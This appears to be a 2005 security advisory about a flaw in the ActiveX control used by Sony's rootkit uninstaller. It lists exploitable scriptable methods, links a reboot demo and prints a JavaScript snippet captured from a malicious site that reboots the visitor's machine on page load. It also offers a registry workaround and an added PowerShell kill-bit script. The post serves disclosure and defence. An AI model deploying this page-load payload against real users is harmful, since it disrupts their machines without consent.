Sony's web-based removal tool can cause another security breach. This was proven by a Finnish researcher named Muzzy.
Muzzy has discovered several scripting methods in the uninstaller of Sony's rootkit, which is called CodeSupport. CodeSupport is an ActiveX control that downloads and installs a file from an internet site, regardless of whether that site is Sony's or not. Here are the scriptable methods:
- GenerateRequestPacket
- ExecuteCode (can crash browser, apparently removed in latest ocx)
- Uninstall
- RebootMachine (exploitable, see demo)
- GetProgress
- OnLoaded
- InitializeDiscScan
- GetNumberOfDiscs
- IsDRMServerValid
- GetAlbumArtist
- GetAlbumName
- GetMaxBurnCount
- GetCurrentBurnCount
- GenerateIncrementPacket
- IsContentOwnerValid
- DoIncrement
- GetInstalledSoftwareVersion
- IsXCPDiscPresent
- InstallUpdate (exploitable)
- GetInstallProgress
- GetCompletionStatus
- IsXCPDiscPresentAsLong
- IsAdministrator
I wonder what the ExecuteCode method does... Anyway, Muzzy has created a demo of the "RebootMachine" method. If you are using Internet Explorer and the DRM uninstaller is installed on your system, the script in the demo page WILL reboot your system. Here is the URL to the demo:
http://hack.fi/~muzzy/sony-drm/reboot.html
The link is deliberately made non-clickable. We do not claim responsibility for any inadvertently rebooted system.
In relation to this, another researcher, at Freedom-to-Tinker, used some of the scripting methods listed above to detect whether CodeSupport is present on your machine (see the Freedom-to-Tinker link below). Again, the script at that link will only execute if you are using MS Internet Explorer.
In summary, if a malicious coder creates a website that uses the scripting methods mentioned above, they can arbitrarily execute any file on a machine that has previously run the ActiveX control (a.k.a. CodeSupport) from Sony's website.
Technical Analysis from Muzzy: http://hack.fi/~muzzy/sony-drm/
Freedom-to-Tinker’s blog: http://www.freedom-to-tinker.com/?p=927
Update (JoneZ, 17 November 2005 15:17:23)
The following steps can be taken to prevent attacks that may be carried out through the ActiveX object:
1. Open regedit.
2. On the left pane click:
- HKLM > Software > Microsoft > Internet Explorer > ActiveX Compatibility > {4EA7C4C5-C5C0-4F5C-A008-8293505F71CC}
Many thanks to Juan Cesar Cuevas for the work around.
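As an added defensive example (not code from the original post or from any of the researchers it cites), the following PowerShell script does two things the post describes by hand: it checks whether the CodeSupport control is still registered on the machine, a registry-side counterpart of the Freedom-to-Tinker browser check mentioned above, and it applies the workaround. The post's steps stop at navigating to the ActiveX Compatibility key, so the script assumes that the intended workaround is Internet Explorer's documented kill bit, i.e. a DWORD value named Compatibility Flags with bit 0x400 set under that key, which stops IE from instantiating the control even though it remains registered. It also assumes that the CLSID given in the workaround is the control's own CLSID. Run it from an elevated PowerShell prompt.

```powershell
# Added example, not from the original post. Assumes the CLSID from the
# workaround is the CodeSupport control's CLSID and that the workaround is
# IE's documented kill bit (Compatibility Flags DWORD, bit 0x400).
# Requires an elevated (Administrator) PowerShell session.

$Clsid     = '{4EA7C4C5-C5C0-4F5C-A008-8293505F71CC}'
$KillBit   = 0x400
$ClassKey  = "HKLM:\SOFTWARE\Classes\CLSID\$Clsid"
$CompatKey = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"

# --- Detection: is the control registered as a COM server at all? ---
if (Test-Path $ClassKey) {
    $server = (Get-ItemProperty -Path "$ClassKey\InprocServer32" -ErrorAction SilentlyContinue).'(default)'
    Write-Output "CodeSupport CLSID is registered. In-process server: $server"
} else {
    Write-Output "CodeSupport CLSID is not registered on this machine."
}

# --- Current state of the kill bit (0 if the key or value is absent) ---
$flags = 0
if (Test-Path $CompatKey) {
    $item = Get-ItemProperty -Path $CompatKey -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if ($null -ne $item) { $flags = [int]$item.'Compatibility Flags' }
}
if (($flags -band $KillBit) -ne 0) {
    Write-Output ("Kill bit already set (Compatibility Flags = 0x{0:X})." -f $flags)
    return
}

# --- Mitigation: set the kill bit, preserving any other flag bits already present ---
if (-not (Test-Path $CompatKey)) {
    New-Item -Path $CompatKey -Force | Out-Null
}
New-ItemProperty -Path $CompatKey -Name 'Compatibility Flags' -PropertyType DWord `
    -Value ($flags -bor $KillBit) -Force | Out-Null

# Read the value back so the result is verified rather than assumed
$verify = (Get-ItemProperty -Path $CompatKey -Name 'Compatibility Flags').'Compatibility Flags'
Write-Output ("Kill bit set. Compatibility Flags is now 0x{0:X}." -f $verify)
```

Two caveats: the kill bit only stops Internet Explorer (and applications hosting its browser control) from instantiating the control; it does not unregister or delete the control, so the detection step will still report it as registered afterwards. On 64-bit Windows the 32-bit browser reads the same key under HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility, so run the same logic against that path as well.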
Update (Ji, 17 November 2005 16:00:16)
It has been discovered that the uninstaller drops a COM object to uninstall the rootkit. Unfortunately, this COM object is not removed after the uninstaller has been installed, which could leave the host susceptible to attacks. Several active websites have been found to exploit this vulnerability: once an "infected" machine accesses such a site, several malicious actions can be performed on it. On one of these sites, the following malicious code has been found:
<!-- Sony DRM Christmas Gift -->
<script language="javascript">
function reboot()
{
    var ObjCS = new Object();
    ObjCS = document['CODESUPPORT'];   // the embedded CodeSupport control, named CODESUPPORT in the page
    ObjCS.RebootMachine();             // scriptable method listed above; reboots the host
}
window.onload = reboot;
</script>
This code reboots (shuts down and restarts) the infected machine. It has been verified to be present on one of the malicious sites, and is only an example of the nasty things that could be done with the "uninstaller". To be safe, apply the workaround described above.
Update (Ivan, 17 November 2005 16:15:51)
Question: What if I do not have the Sony Rootkit Uninstaller in my system, can I still be affected by this exploit?
Answer: Yes, a malware author could EASILY write a very tiny JavaScript and place it in an HTML page that would attempt to launch the ActiveX Updater, readily found and uploaded at the XCP website.
Question: Should we then detect the ActiveX Updater or the Uninstaller itself?
Answer: This still remains to be disputed, since there may be other clients of XCP aside from Sony and having a detection for the said uninstaller file may cause some legal infringements.
Do hold on for more updates.